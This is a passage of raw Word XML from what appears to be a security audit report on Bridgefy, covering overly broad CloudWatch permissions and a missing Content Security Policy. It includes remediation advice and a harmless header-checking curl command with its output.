        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Unrestricted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CloudWatch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note that a similar issue was found for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>EcsExecutionRole</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. This role has full </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CloudWatch </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access, and a restricted policy that only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>allows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>deliver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CloudWatch </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>without the ability to manage any other log groups.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>thoroughly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>remove</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CloudWatch </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access, unless strictly required. The current approach ought to be replaced with a tailored policy that allows the creation and delivery of logs to the service.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Additionally,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a centralized logging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>solution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>implemented.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>way</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>archived</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>external</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>location,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>turn prevent tampering in the event of a security breach of the AWS account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250015" w:id="40"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-041</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP2/3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Info</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy partially fixed this issue and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>verified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is valid. Implementation of the remaining hardening guidance is ongoing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>websites</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>currently</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leverage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>protections offered by the Content Security Policy (CSP). This unnecessarily makes the web applications more prone to Cross Site Scripting (XSS) issues.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attackers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>might leverage this weakness to exploit XSS issues with significantly less difficulty. This weakness can be verified with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="5637" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Affected Hosts: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>developer.staging.bridgefy.me bridgefy.me staging.app.bridgefy.services staging.sdk.bridgefy.services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl https://developer.staging.bridgefy.me/ -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cache-control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: max-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>age=3600</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>content-type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: text/html; charset=utf-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="1872" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>etag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"9826f49c614b837f52399aab81c800887542e1ea224f9aa620f0b5ce4daf1775" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>last-modified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: Wed, 11 Jan 2023 20:54:48 GMT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="4742" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>strict-transport-security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>age=31556926 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>accept-ranges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: Sat, 21 Jan 2023 16:16:49 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GMT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="5930" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x-served-by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
